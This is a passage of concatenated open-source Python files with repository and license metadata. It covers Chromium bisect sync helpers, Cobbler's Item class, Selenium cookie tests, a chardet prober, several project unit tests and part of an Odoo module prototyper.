False os.chdir('cros') cmd = ['init', '-u'] + REPO_PARAMS passed = False if not _RunRepo(cmd): if not _RunRepo(['sync']): passed = True os.chdir(cwd) return passed def _RunRepo(params): """Runs CrOS repo command with specified parameters. Args: params: A list of parameters to pass to gclient. Returns: The return code of the call (zero indicates success). """ cmd = ['repo'] + params return _SubprocessCall(cmd) def RunRepoSyncAtTimestamp(timestamp): """Syncs all git depots to the timestamp specified using repo forall. Args: params: Unix timestamp to sync to. Returns: The return code of the call. """ cmd = ['forall', '-c', REPO_SYNC_COMMAND % timestamp] return _RunRepo(cmd) def RunGClientAndCreateConfig(opts, custom_deps=None, cwd=None): """Runs gclient and creates a config containing both src and src-internal. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. cwd: Working directory to run from. Returns: The return code of the call. """ spec = GCLIENT_SPEC_DATA if custom_deps: for k, v in custom_deps.iteritems(): spec[0]['custom_deps'][k] = v # Cannot have newlines in string on windows spec = 'solutions =' + str(spec) spec = ''.join([l for l in spec.splitlines()]) if 'android' in opts.target_platform: spec += GCLIENT_SPEC_ANDROID return_code = RunGClient( ['config', '--spec=%s' % spec, '--git-deps'], cwd=cwd) return return_code def IsDepsFileBlink(): """Reads .DEPS.git and returns whether or not we're using blink. Returns: True if blink, false if webkit. """ locals = { 'Var': lambda _: locals["vars"][_], 'From': lambda *args: None } execfile(FILE_DEPS_GIT, {}, locals) return 'blink.git' in locals['vars']['webkit_url'] def OnAccessError(func, path, _): """Error handler for shutil.rmtree. Source: http://goo.gl/DEYNCT If the error is due to an access error (read only file), it attempts to add write permissions, then retries. If the error is for another reason it re-raises the error. Args: func: The function that raised the error. path: The path name passed to func. _: Exception information from sys.exc_info(). Not used. """ if not os.access(path, os.W_OK): os.chmod(path, stat.S_IWUSR) func(path) else: raise def RemoveThirdPartyDirectory(dir_name): """Removes third_party directory from the source. At some point, some of the third_parties were causing issues to changes in the way they are synced. We remove such folder in order to avoid sync errors while bisecting. Returns: True on success, otherwise False. """ path_to_dir = os.path.join(os.getcwd(), 'third_party', dir_name) try: if os.path.exists(path_to_dir): shutil.rmtree(path_to_dir, onerror=OnAccessError) except OSError, e: print 'Error #%d while running shutil.rmtree(%s): %s' % ( e.errno, path_to_dir, str(e)) if e.errno != errno.ENOENT: return False return True def _CleanupPreviousGitRuns(): """Cleans up any leftover index.lock files after running git.""" # If a previous run of git crashed, or bot was reset, etc., then we might # end up with leftover index.lock files. for path, _, files in os.walk(os.getcwd()): for cur_file in files: if cur_file.endswith('index.lock'): path_to_file = os.path.join(path, cur_file) os.remove(path_to_file) def RunGClientAndSync(cwd=None): """Runs gclient and does a normal sync. Args: cwd: Working directory to run from. Returns: The return code of the call. """ params = ['sync', '--verbose', '--nohooks', '--reset', '--force'] return RunGClient(params, cwd=cwd) def SetupGitDepot(opts, custom_deps): """Sets up the depot for the bisection. The depot will be located in a subdirectory called 'bisect'. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. Returns: True if gclient successfully created the config file and did a sync, False otherwise. """ name = 'Setting up Bisection Depot' if opts.output_buildbot_annotations: OutputAnnotationStepStart(name) passed = False if not RunGClientAndCreateConfig(opts, custom_deps): passed_deps_check = True if os.path.isfile(os.path.join('src', FILE_DEPS_GIT)): cwd = os.getcwd() os.chdir('src') if not IsDepsFileBlink(): passed_deps_check = RemoveThirdPartyDirectory('Webkit') else: passed_deps_check = True if passed_deps_check: passed_deps_check = RemoveThirdPartyDirectory('libjingle') if passed_deps_check: passed_deps_check = RemoveThirdPartyDirectory('skia') os.chdir(cwd) if passed_deps_check: _CleanupPreviousGitRuns() RunGClient(['revert']) if not RunGClientAndSync(): passed = True if opts.output_buildbot_annotations: print OutputAnnotationStepClosed() return passed def CheckIfBisectDepotExists(opts): """Checks if the bisect directory already exists. Args: opts: The options parsed from the command line through parse_args(). Returns: Returns True if it exists. """ path_to_dir = os.path.join(opts.working_directory, 'bisect', 'src') return os.path.exists(path_to_dir) def CheckRunGit(command, cwd=None): """Run a git subcommand, returning its output and return code. Asserts if the return code of the call is non-zero. Args: command: A list containing the args to git. Returns: A tuple of the output and return code. """ (output, return_code) = RunGit(command, cwd=cwd) assert not return_code, 'An error occurred while running'\ ' "git %s"' % ' '.join(command) return output def RunGit(command, cwd=None): """Run a git subcommand, returning its output and return code. Args: command: A list containing the args to git. cwd: A directory to change to while running the git command (optional). Returns: A tuple of the output and return code. """ command = ['git'] + command return RunProcessAndRetrieveOutput(command, cwd=cwd) def CreateBisectDirectoryAndSetupDepot(opts, custom_deps): """Sets up a subdirectory 'bisect' and then retrieves a copy of the depot there using gclient. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. """ if not _CreateAndChangeToSourceDirectory(opts.working_directory): raise RuntimeError('Could not create bisect directory.') if not SetupGitDepot(opts, custom_deps): raise RuntimeError('Failed to grab source.') def RunProcess(command): """Runs an arbitrary command. If output from the call is needed, use RunProcessAndRetrieveOutput instead. Args: command: A list containing the command and args to execute. Returns: The return code of the call. """ # On Windows, use shell=True to get PATH interpretation. shell = IsWindowsHost() return subprocess.call(command, shell=shell) def RunProcessAndRetrieveOutput(command, cwd=None): """Runs an arbitrary command, returning its output and return code. Since output is collected via communicate(), there will be no output until the call terminates. If you need output while the program runs (ie. so that the buildbot doesn't terminate the script), consider RunProcess(). Args: command: A list containing the command and args to execute. cwd: A directory to change to while running the command. The command can be relative to this directory. If this is None, the command will be run in the current directory. Returns: A tuple of the output and return code. """ if cwd: original_cwd = os.getcwd() os.chdir(cwd) # On Windows, use shell=True to get PATH interpretation. shell = IsWindowsHost() proc = subprocess.Popen(command, shell=shell, stdout=subprocess.PIPE) (output, _) = proc.communicate() if cwd: os.chdir(original_cwd) return (output, proc.returncode) def IsStringInt(string_to_check): """Checks whether or not the given string can be converted to a integer. Args: string_to_check: Input string to check if it can be converted to an int. Returns: True if the string can be converted to an int. """ try: int(string_to_check) return True except ValueError: return False def IsStringFloat(string_to_check): """Checks whether or not the given string can be converted to a floating point number. Args: string_to_check: Input string to check if it can be converted to a float. Returns: True if the string can be converted to a float. """ try: float(string_to_check) return True except ValueError: return False def IsWindowsHost(): """Checks whether or not the script is running on Windows. Returns: True if running on Windows. """ return sys.platform == 'cygwin' or sys.platform.startswith('win') def Is64BitWindows(): """Returns whether or not Windows is a 64-bit version. Returns: True if Windows is 64-bit, False if 32-bit. """ platform = os.environ['PROCESSOR_ARCHITECTURE'] try: platform = os.environ['PROCESSOR_ARCHITEW6432'] except KeyError: # Must not be running in WoW64, so PROCESSOR_ARCHITECTURE is correct pass return platform in ['AMD64', 'I64'] def IsLinuxHost(): """Checks whether or not the script is running on Linux. Returns: True if running on Linux. """ return sys.platform.startswith('linux') def IsMacHost(): """Checks whether or not the script is running on Mac. Returns: True if running on Mac. """ return sys.platform.startswith('darwin')
bsd-3-clause
jdobes/cobbler
cobbler/item.py
1
13896
""" An Item is a serializable thing that can appear in a Collection Copyright 2006-2009, Red Hat, Inc Michael DeHaan <mdehaan@redhat.com> This software may be freely redistributed under the terms of the GNU general public license. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. """ import exceptions import utils from cexceptions import * from utils import _ import pprint import fnmatch class Item: TYPE_NAME = "generic" def __init__(self,config,is_subobject=False): """ Constructor. Requires a back reference to the Config management object. NOTE: is_subobject is used for objects that allow inheritance in their trees. This inheritance refers to conceptual inheritance, not Python inheritance. Objects created with is_subobject need to call their set_parent() method immediately after creation and pass in a value of an object of the same type. Currently this is only supported for profiles. Subobjects blend their data with their parent objects and only require a valid parent name and a name for themselves, so other required options can be gathered from items further up the cobbler tree. Old cobbler: New cobbler: distro distro profile profile system profile <-- created with is_subobject=True system <-- created as normal For consistancy, there is some code supporting this in all object types, though it is only usable (and only should be used) for profiles at this time. Objects that are children of objects of the same type (i.e. subprofiles) need to pass this in as True. Otherwise, just use False for is_subobject and the parent object will (therefore) have a different type. """ self.config = config self.settings = self.config._settings self.clear(is_subobject) # reset behavior differs for inheritance cases self.parent = '' # all objects by default are not subobjects self.children = {} # caching for performance reasons, not serialized self.log_func = self.config.api.log self.ctime = 0 # to be filled in by collection class self.mtime = 0 # to be filled in by collection class self.uid = "" # to be filled in by collection class self.last_cached_mtime = 0 self.cached_datastruct = "" def clear(self,is_subobject=False): """ Reset this object. """ utils.clear_from_fields(self,self.get_fields(),is_subobject=is_subobject) def make_clone(self): raise exceptions.NotImplementedError def from_datastruct(self,seed_data): """ Modify this object to take on values in seed_data """ return utils.from_datastruct_from_fields(self,seed_data,self.get_fields()) def to_datastruct(self): return utils.to_datastruct_from_fields(self, self.get_fields()) def printable(self): return utils.printable_from_fields(self,self.get_fields()) def remote_methods(self): return utils.get_remote_methods_from_fields(self,self.get_fields()) def set_uid(self,uid): self.uid = uid def get_children(self,sorted=True): """ Get direct children of this object. """ keys = self.children.keys() if sorted: keys.sort() results = [] for k in keys: results.append(self.children[k]) return results def get_descendants(self): """ Get objects that depend on this object, i.e. those that would be affected by a cascading delete, etc. """ results = [] kids = self.get_children(sorted=False) results.extend(kids) for kid in kids: grandkids = kid.get_descendants() results.extend(grandkids) return results def get_parent(self): """ For objects with a tree relationship, what's the parent object? """ return None def get_conceptual_parent(self): """ The parent may just be a superclass for something like a subprofile. Get the first parent of a different type. """ # FIXME: this is a workaround to get the type of an instance var # what's a more clean way to do this that's python 2.3 friendly? # this returns something like: cobbler.item_system.System mtype = str(self).split(" ")[0][1:] parent = self.get_parent() while parent is not None: ptype = str(parent).split(" ")[0][1:] if mtype != ptype: self.conceptual_parent = parent return parent parent = parent.get_parent() return None def set_name(self,name): """ All objects have names, and with the exception of System they aren't picky about it. """ if self.name not in ["",None] and self.parent not in ["",None] and self.name == self.parent: raise CX(_("self parentage is weird")) if not isinstance(name, basestring): raise CX(_("name must be a string")) for x in name: if not x.isalnum() and not x in [ "_", "-", ".", ":", "+" ] : raise CX(_("invalid characters in name: '%s'" % name)) self.name = name return True def set_comment(self, comment): if comment is None: comment = "" self.comment = comment return True def set_owners(self,data): """ The owners field is a comment unless using an authz module that pays attention to it, like authz_ownership, which ships with Cobbler but is off by default. Consult the Wiki docs for more info on CustomizableAuthorization. """ owners = utils.input_string_or_list(data) self.owners = owners return True def set_kernel_options(self,options,inplace=False): """ Kernel options are a space delimited list, like 'a=b c=d e=f g h i=j' or a hash. """ (success, value) = utils.input_string_or_hash(options) if not success: raise CX(_("invalid kernel options")) else: if inplace: for key in value.keys(): if key.startswith("~"): del self.kernel_options[key[1:]] else: self.kernel_options[key] = value[key] else: self.kernel_options = value return True def set_kernel_options_post(self,options,inplace=False): """ Post kernel options are a space delimited list, like 'a=b c=d e=f g h i=j' or a hash. """ (success, value) = utils.input_string_or_hash(options) if not success: raise CX(_("invalid post kernel options")) else: if inplace: for key in value.keys(): if key.startswith("~"): del self.self.kernel_options_post[key[1:]] else: self.kernel_options_post[key] = value[key] else: self.kernel_options_post = value return True def set_ks_meta(self,options,inplace=False): """ A comma delimited list of key value pairs, like 'a=b,c=d,e=f' or a hash. The meta tags are used as input to the templating system to preprocess kickstart files """ (success, value) = utils.input_string_or_hash(options,allow_multiples=False) if not success: return False else: if inplace: for key in value.keys(): if key.startswith("~"): del self.ks_meta[key[1:]] else: self.ks_meta[key] = value[key] else: self.ks_meta = value return True def set_mgmt_classes(self,mgmt_classes): """ Assigns a list of configuration management classes that can be assigned to any object, such as those used by Puppet's external_nodes feature. """ mgmt_classes_split = utils.input_string_or_list(mgmt_classes) self.mgmt_classes = utils.input_string_or_list(mgmt_classes_split) return True def set_template_files(self,template_files,inplace=False): """ A comma seperated list of source=destination templates that should be generated during a sync. """ (success, value) = utils.input_string_or_hash(template_files,allow_multiples=False) if not success: return False else: if inplace: for key in value.keys(): if key.startswith("~"): del self.template_files[key[1:]] else: self.template_files[key] = value[key] else: self.template_files = value return True def sort_key(self,sort_fields=[]): data = self.to_datastruct() return [data.get(x,"") for x in sort_fields] def find_match(self,kwargs,no_errors=False): # used by find() method in collection.py data = self.to_datastruct() for (key, value) in kwargs.iteritems(): # Allow ~ to negate the compare if value is not None and value.startswith("~"): res=not self.find_match_single_key(data,key,value[1:],no_errors) else: res=self.find_match_single_key(data,key,value,no_errors) if not res: return False return True def find_match_single_key(self,data,key,value,no_errors=False): # special case for systems key_found_already = False if data.has_key("interfaces"): if key in [ "mac_address", "ip_address", "subnet", "netmask", "virt_bridge", \ "dhcp_tag", "dns_name", "static_routes", "interface_type", \ "interface_master", "bonding_opts", "bridge_opts", "bonding", "bonding_master" ]: if key == "bonding": key = "interface_type" # bonding is deprecated elif key == "bonding_master": key = "interface_master" # bonding_master is deprecated key_found_already = True for (name, interface) in data["interfaces"].iteritems(): if value is not None and interface.has_key(key): if self.__find_compare(interface[key], value): return True if not data.has_key(key): if not key_found_already: if not no_errors: # FIXME: removed for 2.0 code, shouldn't cause any problems to not have an exception here? # raise CX(_("searching for field that does not exist: %s" % key)) return False else: if value is not None: # FIXME: new? return False if value is None: return True else: return self.__find_compare(value, data[key]) def __find_compare(self, from_search, from_obj): if isinstance(from_obj, basestring): # FIXME: fnmatch is only used for string to string comparisions # which should cover most major usage, if not, this deserves fixing if fnmatch.fnmatch(from_obj.lower(), from_search.lower()): return True else: return False else: if isinstance(from_search, basestring): if type(from_obj) == type([]): from_search = utils.input_string_or_list(from_search) for x in from_search: if x not in from_obj: return False return True if type(from_obj) == type({}): (junk, from_search) = utils.input_string_or_hash(from_search,allow_multiples=True) for x in from_search.keys(): y = from_search[x] if not from_obj.has_key(x): return False if not (y == from_obj[x]): return False return True if type(from_obj) == type(True): if from_search.lower() in [ "true", "1", "y", "yes" ]: inp = True else: inp = False if inp == from_obj: return True return False raise CX(_("find cannot compare type: %s") % type(from_obj)) def dump_vars(self,data,format=True): raw = utils.blender(self.config.api, False, self) if format: return pprint.pformat(raw) else: return raw def set_depth(self,depth): self.depth = depth def set_ctime(self,ctime): self.ctime = ctime def set_mtime(self,mtime): self.mtime = mtime def set_parent(self,parent): self.parent = parent def check_if_valid(self): """ Raise exceptions if the object state is inconsistent """ if self.name is None or self.name == "": raise CX("Name is required")
gpl-2.0
bwp/SeleniumWebDriver
py/test/selenium/webdriver/common/cookie_tests.py
28
3282
import calendar import time import unittest import random import pytest from selenium.test.selenium.webdriver.common import utils class CookieTest(unittest.TestCase): def setUp(self): self._loadPage("simpleTest") # Set the cookie to expire in 30 minutes timestamp = calendar.timegm(time.gmtime()) + (30 * 60) self.COOKIE_A = {"name": "foo", "value": "bar", "path": "/", "secure": False} def tearDown(self): self.driver.delete_all_cookies() def testAddCookie(self): self.driver.execute_script("return document.cookie") self.driver.add_cookie(self.COOKIE_A) cookie_returned = str(self.driver.execute_script("return document.cookie")) self.assertTrue(self.COOKIE_A["name"] in cookie_returned) def testAddingACookieThatExpiredInThePast(self): if self.driver.name == 'internet explorer': pytest.skip("Issue needs investigating") cookie = self.COOKIE_A.copy() cookie["expiry"] = calendar.timegm(time.gmtime()) - 1 self.driver.add_cookie(cookie) cookies = self.driver.get_cookies() self.assertEquals(0, len(cookies)) def testDeleteAllCookie(self): self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A)) self.driver.delete_all_cookies() self.assertFalse(self.driver.get_cookies()) def testDeleteCookie(self): self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A)) self.driver.delete_cookie("foo") self.assertFalse(self.driver.get_cookies()) def testShouldGetCookieByName(self): key = "key_%d" % int(random.random()*10000000) self.driver.execute_script("document.cookie = arguments[0] + '=set';", key) cookie = self.driver.get_cookie(key) self.assertEquals("set", cookie["value"]) def testGetAllCookies(self): key1 = "key_%d" % int(random.random()*10000000) key2 = "key_%d" % int(random.random()*10000000) cookies = self.driver.get_cookies() count = len(cookies) one = {"name" :key1, "value": "value"} two = {"name":key2, "value": "value"} self.driver.add_cookie(one) self.driver.add_cookie(two) self._loadPage("simpleTest") cookies = self.driver.get_cookies() self.assertEquals(count + 2, len(cookies)) def testShouldNotDeleteCookiesWithASimilarName(self): cookieOneName = "fish" cookie1 = {"name" :cookieOneName, "value":"cod"} cookie2 = {"name" :cookieOneName + "x", "value": "earth"} self.driver.add_cookie(cookie1) self.driver.add_cookie(cookie2) self.driver.delete_cookie(cookieOneName) cookies = self.driver.get_cookies() self.assertFalse(cookie1["name"] == cookies[0]["name"], msg=str(cookies)) self.assertEquals(cookie2["name"] , cookies[0]["name"], msg=str(cookies)) def _loadPage(self, name): self.driver.get(self._pageURL(name)) def _pageURL(self, name): return "http://localhost:%d/%s.html" % (self.webserver.port, name)
apache-2.0
abhikumar22/MYBLOG
blg/Lib/site-packages/pip/_vendor/requests/packages/chardet/euctwprober.py
2994
1676
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is mozilla.org code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### from .mbcharsetprober import MultiByteCharSetProber from .codingstatemachine import CodingStateMachine from .chardistribution import EUCTWDistributionAnalysis from .mbcssm import EUCTWSMModel class EUCTWProber(MultiByteCharSetProber): def __init__(self): MultiByteCharSetProber.__init__(self) self._mCodingSM = CodingStateMachine(EUCTWSMModel) self._mDistributionAnalyzer = EUCTWDistributionAnalysis() self.reset() def get_charset_name(self): return "EUC-TW"
gpl-3.0
Jannes123/inasafe
safe/utilities/test/test_printing.py
10
1055
__author__ = 'timlinux' import unittest from safe.utilities.printing import ( mm_to_points, points_to_mm, dpi_to_meters) class TestPrinting(unittest.TestCase): def test_mm_to_points(self): """Test that conversions between pixel and page dimensions work.""" dpi = 300 pixels = 300 mm = 25.4 # 1 inch result = points_to_mm(pixels, dpi) message = "Expected: %s\nGot: %s" % (mm, result) assert result == mm, message result = mm_to_points(mm, dpi) message = "Expected: %s\nGot: %s" % (pixels, result) assert result == pixels, message def test_dpi_to_meters(self): """Test conversion from dpi to dpm.""" dpi = 300 dpm = dpi_to_meters(dpi) expected_dpm = 11811.023622 message = ( 'Conversion from dpi to dpm failed\n' ' Got: %s Expected: %s\n' % (dpm, expected_dpm)) self.assertAlmostEqual(dpm, expected_dpm, msg=message) if __name__ == '__main__': unittest.main()
gpl-3.0
yac/packstack
tests/installer/test_processors.py
5
1621
# -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2013, Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import shutil import tempfile from unittest import TestCase from packstack.installer.processors import * from ..test_base import PackstackTestCaseMixin class ProcessorsTestCase(PackstackTestCaseMixin, TestCase): def test_process_host(self): """Test packstack.installer.processors.process_host""" proc_local = process_host('localhost', process_args={'allow_localhost': True}) self.assertIn(proc_local, ['127.0.0.1', '::1']) def test_process_ssh_key(self): """Test packstack.installer.processors.process_ssh_key""" path = process_ssh_key(os.path.join(self.tempdir, 'id_rsa')) # test if key was created self.assertEquals(True, bool(path)) # test if key exists # XXX: process_ssh_key does not create ssh key during test run # ... not sure why, nevertheless it works in normal run #self.assertEquals(True, os.path.isfile(path))
apache-2.0
Tetpay/cjdns
node_build/dependencies/libuv/build/gyp/test/mac/gyptest-xcode-env-order.py
75
3463
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Verifies that dependent Xcode settings are processed correctly. """ import TestGyp import subprocess import sys def XcodeVersion(): stdout = subprocess.check_output(['xcodebuild', '-version']) version = stdout.splitlines()[0].split()[-1].replace('.', '') return (version + '0' * (3 - len(version))).zfill(4) if sys.platform == 'darwin': test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode']) CHDIR = 'xcode-env-order' INFO_PLIST_PATH = 'Test.app/Contents/Info.plist' test.run_gyp('test.gyp', chdir=CHDIR) test.build('test.gyp', test.ALL, chdir=CHDIR) # Env vars in 'copies' filenames. test.built_file_must_exist('Test-copy-brace/main.c', chdir=CHDIR) test.built_file_must_exist('Test-copy-paren/main.c', chdir=CHDIR) test.built_file_must_exist('Test-copy-bare/main.c', chdir=CHDIR) # Env vars in 'actions' filenames and inline actions test.built_file_must_exist('action-copy-brace.txt', chdir=CHDIR) test.built_file_must_exist('action-copy-paren.txt', chdir=CHDIR) test.built_file_must_exist('action-copy-bare.txt', chdir=CHDIR) # Env vars in 'rules' filenames and inline actions test.built_file_must_exist('rule-copy-brace.txt', chdir=CHDIR) test.built_file_must_exist('rule-copy-paren.txt', chdir=CHDIR) # TODO: see comment in test.gyp for this file. #test.built_file_must_exist('rule-copy-bare.txt', chdir=CHDIR) # Env vars in Info.plist. info_plist = test.built_file_path(INFO_PLIST_PATH, chdir=CHDIR) test.must_exist(info_plist) test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey2</key> \t<string>/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BraceProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey2</key> \t<string>/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>ParenProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BareProcessedKey1</key> \t<string>D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>BareProcessedKey2</key> \t<string>/Source/Project/Test</string>''') # NOTE: For bare variables, $PRODUCT_TYPE is not replaced! It _is_ replaced # if it's not right at the start of the string (e.g. ':$PRODUCT_TYPE'), so # this looks like an Xcode bug. This bug isn't emulated (yet?), so check this # only for Xcode. if test.format == 'xcode' and XcodeVersion() < '0500': test.must_contain(info_plist, '''\ \t<key>BareProcessedKey3</key> \t<string>$PRODUCT_TYPE:D:/Source/Project/Test</string>''') else: # The bug has been fixed by Xcode version 5.0.0. test.must_contain(info_plist, '''\ \t<key>BareProcessedKey3</key> \t<string>com.apple.product-type.application:D:/Source/Project/Test</string>''') test.must_contain(info_plist, '''\ \t<key>MixedProcessedKey</key> \t<string>/Source/Project:Test:mh_execute</string>''') test.pass_test()
gpl-3.0
Antiun/server-tools
module_prototyper/models/module_prototyper.py
26
20598
# -*- encoding: utf-8 -*- # ############################################################################# # # OpenERP, Open Source Management Solution # This module copyright (C) 2010 - 2014 Savoir-faire Linux # (<http://www.savoirfairelinux.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import base64 import logging import lxml.etree import os import re import textwrap from collections import namedtuple from datetime import date from jinja2 import Environment, FileSystemLoader from openerp import models, api, fields from openerp.tools.safe_eval import safe_eval from . import licenses _logger = logging.getLogger(__name__) YEAR = date.today().year class ModulePrototyper(models.Model): """Module Prototyper gathers different information from all over the database to build a prototype of module. We are calling it a prototype as it will most likely need to be reviewed by a developer to fix glitch that would sneak it during the generation of files but also to add not supported features. """ _name = "module_prototyper" _description = "Module Prototyper" def get_default_description(self): """ Extract the content of default description """ filepath = '{}/../data/README.rst'.format(os.path.dirname(__file__)) with open(filepath, 'r') as content_file: content = content_file.read() return content license = fields.Selection( [ (licenses.GPL3, 'GPL Version 3'), (licenses.GPL3_L, 'GPL-3 or later version'), (licenses.LGPL3, 'LGPL-3'), (licenses.LGPL3_L, 'LGPL-3 or later version'), (licenses.AGPL3, 'Affero GPL-3'), (licenses.OSI, 'Other OSI Approved Licence'), ('Other proprietary', 'Other Proprietary') ], string='License', default=licenses.AGPL3, ) name = fields.Char( 'Technical Name', required=True, help=('The technical name will be used to define the name of ' 'the exported module, the name of the model.') ) category_id = fields.Many2one('ir.module.category', 'Category') human_name = fields.Char( 'Module Name', required=True, help=('The Module Name will be used as the displayed name of the ' 'exported module.') ) summary = fields.Char('Summary', required=True, help=('Enter a summary of your module')) description = fields.Text( 'Description', required=True, help=('Enter the description of your module, what it does, how to ' 'install, configure and use it, the roadmap or known issues. ' 'The description will be exported in README.rst'), default=get_default_description ) author = fields.Char('Author', required=True, help=('Enter your name')) maintainer = fields.Char( 'Maintainer', help=('Enter the name of the person or organization who will ' 'maintain this module') ) website = fields.Char('Website', help=('Enter the URL of your website')) icon_image = fields.Binary( 'Icon', help=('The icon set up here will be used as the icon ' 'for the exported module also') ) version = fields.Char( 'Version', size=9, default='8.0.1.0.0', help=('Enter the version of your module with 5 digits') ) auto_install = fields.Boolean( 'Auto Install', default=False, help='Check if the module should be install by default.' ) application = fields.Boolean( 'Application', default=False, help='Check if the module is an Odoo application.' ) # Relations dependency_ids = fields.Many2many( 'ir.module.module', 'module_prototyper_module_rel', 'module_prototyper_id', 'module_id', 'Dependencies', help=('Enter the list of required modules that need to be installed ' 'for your module to work properly') ) data_ids = fields.Many2many( 'ir.filters', 'prototype_data_rel', 'module_prototyper_id', 'filter_id', 'Data filters', help="The records matching the filters will be added as data." ) demo_ids = fields.Many2many( 'ir.filters', 'prototype_demo_rel', 'module_prototyper_id', 'filter_id', 'Demo filters', help="The records matching the filters will be added as demo data." ) field_ids = fields.Many2many( 'ir.model.fields', 'prototype_fields_rel', 'module_prototyper_id', 'field_id', 'Fields', help=('Enter the list of fields that you have created or modified ' 'and want to export in this module. New models will be ' 'exported as long as you choose one of his fields.') ) menu_ids = fields.Many2many( 'ir.ui.menu', 'prototype_menu_rel', 'module_prototyper_id', 'menu_id', 'Menu Items', help=('Enter the list of menu items that you have created and want ' 'to export in this module. Related windows actions will be ' 'exported as well.') ) view_ids = fields.Many2many( 'ir.ui.view', 'prototype_view_rel', 'module_prototyper_id', 'view_id', 'Views', help=('Enter the list of views that you have created and want to ' 'export in this module.') ) group_ids = fields.Many2many( 'res.groups', 'prototype_groups_rel', 'module_prototyper_id', 'group_id', 'Groups', help=('Enter the list of groups that you have created and want to ' 'export in this module.') ) right_ids = fields.Many2many( 'ir.model.access', 'prototype_rights_rel', 'module_prototyper_id', 'right_id', 'Access Rights', help=('Enter the list of access rights that you have created and ' 'want to export in this module.') ) rule_ids = fields.Many2many( 'ir.rule', 'prototype_rule_rel', 'module_prototyper_id', 'rule_id', 'Record Rules', help=('Enter the list of record rules that you have created and ' 'want to export in this module.') ) report_ids = fields.Many2many( 'ir.actions.report.xml', 'prototype_report_rel', 'module_prototyper_id', 'report_id', 'Reports', help=('Enter the list of reports that you have created and ' 'want to export in this module.') ) activity_ids = fields.Many2many( 'workflow.activity', 'prototype_wf_activity_rel', 'module_prototyper_id', 'activity_id', 'Activities', help=('Enter the list of workflow activities that you have created ' 'and want to export in this module') ) transition_ids = fields.Many2many( 'workflow.transition', 'prototype_wf_transition_rel', 'module_prototyper_id', 'transition_id', 'Transitions', help=('Enter the list of workflow transitions that you have created ' 'and want to export in this module') ) _env = None _data_files = () _demo_files = () _field_descriptions = None File_details = namedtuple('file_details', ['filename', 'filecontent']) template_path = '{}/../templates/'.format(os.path.dirname(__file__)) @api.model def set_jinja_env(self, api_version): """Set the Jinja2 environment. The environment will helps the system to find the templates to render. :param api_version: string, odoo api :return: jinja2.Environment instance. """ if self._env is None: self._env = Environment( lstrip_blocks=True, trim_blocks=True, loader=FileSystemLoader( os.path.join(self.template_path, api_version) ) ) return self._env def set_field_descriptions(self): """Mock the list of fields into dictionary. It allows us to add or change attributes of the fields. :return: None """ for field in self.field_ids: field_description = {} # This will mock a field record. # the mock will allow us to add data or modify the data # of the field (like for the name) with keeping all the # attributes of the record. field_description.update({ attr_name: getattr(field, attr_name) for attr_name in dir(field) if not attr_name[0] == '_' }) field_description['name'] = self.unprefix(field.name) self._field_descriptions[field] = field_description @api.model def generate_files(self): """ Generates the files from the details of the prototype. :return: tuple """ assert self._env is not None, \ 'Run set_env(api_version) before to generate files.' # Avoid sharing these across instances self._data_files = [] self._demo_files = [] self._field_descriptions = {} self.set_field_descriptions() file_details = [] file_details.extend(self.generate_models_details()) file_details.extend(self.generate_views_details()) file_details.extend(self.generate_menus_details()) file_details.append(self.generate_module_init_file_details()) file_details.extend(self.generate_data_files()) # must be the last as the other generations might add information # to put in the __openerp__: additional dependencies, views files, etc. file_details.append(self.generate_module_openerp_file_details()) if self.icon_image: file_details.append(self.save_icon()) return file_details @api.model def 